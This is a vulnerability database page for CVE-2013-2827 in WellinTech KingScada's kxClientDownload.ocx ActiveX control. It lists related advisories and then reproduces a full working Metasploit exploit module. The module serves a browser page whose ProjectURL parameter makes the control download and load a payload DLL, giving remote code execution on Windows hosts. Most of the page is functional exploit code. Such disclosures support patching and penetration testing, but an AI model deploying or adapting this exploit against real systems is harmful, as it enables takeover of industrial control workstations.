KingScada kxClientDownload.ocx ActiveX Remote Code Executio
Reporter | Title | Published | Views | Family All 11 |
---|---|---|---|---|
Zero Day Initiative | WellinTech KingScada KingGraphic kxClientDownload ActiveX Remote Code Execution Vulnerability | 5 Feb 201400:00 | β | zdi |
CVE | CVE-2013-2827 | 15 Jan 201416:08 | β | cve |
Prion | Code injection | 15 Jan 201416:08 | β | prion |
Cvelist | CVE-2013-2827 | 15 Jan 201416:00 | β | cvelist |
0day.today | KingScada kxClientDownload.ocx ActiveX Remote Code Execution | 11 Feb 201400:00 | β | zdt |
seebug.org | KingSCADA/KingGraphicθΏη¨δ»£η ζ§θ‘ζΌζ΄ | 12 Feb 201400:00 | β | seebug |
NVD | CVE-2013-2827 | 15 Jan 201416:08 | β | nvd |
Check Point Advisories | WellinTech Multiple Products kxClientDownload ActiveX Remote Code Execution (CVE-2013-2827) | 13 Mar 201400:00 | β | checkpoint_advisories |
Packet Storm | KingScada kxClientDownload.ocx ActiveX Remote Code Execution | 11 Feb 201400:00 | β | packetstorm |
Exploit DB | KingScada - kxClientDownload.ocx ActiveX Remote Code Execution (Metasploit) | 11 Feb 201400:00 | β | exploitdb |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::BrowserExploitServer
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'KingScada kxClientDownload.ocx ActiveX Remote Code Execution',
'Description' => %q{
This module abuses the kxClientDownload.ocx ActiveX control distributed with WellingTech KingScada.
The ProjectURL property can be abused to download and load arbitrary DLLs from
arbitrary locations, leading to arbitrary code execution, because of a dangerous
usage of LoadLibrary. Due to the nature of the vulnerability, this module will work
only when Protected Mode is not present or not enabled.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Andrea Micalizzi', # aka rgod original discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
['CVE', '2013-2827'],
['OSVDB', '102135'],
['BID', '64941'],
['ZDI', '14-011'],
['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-13-344-01']
],
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'BrowserRequirements' =>
{
:source => /script|headers/i,
:os_name => OperatingSystems::Match::WINDOWS,
:ua_name => /MSIE|KXCLIE/i,
:activex => [
{
clsid: '{1A90B808-6EEF-40FF-A94C-D7C43C847A9F}',
method: 'ProjectURL'
}
],
},
'Payload' =>
{
'Space' => 2048,
'StackAdjustment' => -3500,
'DisableNopes' => true
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2014-01-14'))
end
def on_request_exploit(cli, request, target_info)
print_status("Requested: #{request.uri}")
if request.uri =~ /\/libs\/.*\.dll/
print_good("Sending DLL payload")
send_response(cli,
generate_payload_dll(:code => get_payload(cli, target_info)),
'Content-Type' => 'application/octet-stream'
)
return
elsif request.uri =~ /\/libs\//
print_status("Sending not found")
send_not_found(cli)
return
end
content = <<-EOS
<html>
<body>
<object classid='clsid:1A90B808-6EEF-40FF-A94C-D7C43C847A9F' id='#{rand_text_alpha(10 + rand(10))}'>
<param name="ProjectURL" value="#{get_module_uri}"></param>
</object>
</body>
</html>
EOS
print_status("Sending #{self.name}")
send_response_html(cli, content)
end
end
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo